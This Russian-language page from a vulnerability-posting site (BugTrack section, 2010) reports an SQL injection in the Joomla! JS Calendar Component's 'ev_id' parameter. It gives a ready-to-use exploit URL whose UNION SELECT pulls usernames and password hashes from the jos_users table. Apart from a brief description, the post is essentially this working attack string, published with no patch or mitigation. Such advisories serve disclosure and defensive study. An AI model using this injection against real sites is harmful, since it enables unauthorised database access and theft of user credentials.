| Меню |
|
 |
| Категории |
|
 |
| Статистика |
Онлайн всего: 1 Гостей: 1 Пользователей: 0 |
 |
| Вход |
|
 |
|
 |  |  |
| Главная » 2010 » Октябрь » 13 » SQL-инъекция в Joomla! JS Calendar Component
10:06 SQL-инъекция в Joomla! JS Calendar Component |
Программа: Joomla! JS Calendar Component
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "ev_id" (когда "option" установлен в "com_jscalendar", "view" установлен в "jscalendar", и "task" установлен в "details"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site/path/index.php?option=com_jscalendar&view=jscalendar&task= details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
|
|
Категория: BugTrack |
Просмотров: 710 |
Добавил: sepos
| Рейтинг: 5.0/1 |
Добавлять комментарии могут только зарегистрированные пользователи. [ Регистрация | Вход ]
| |
 |  |  |
|
| Поиск |
|
 |
| Календарь |
|
 |
| Архив |
|
 |
|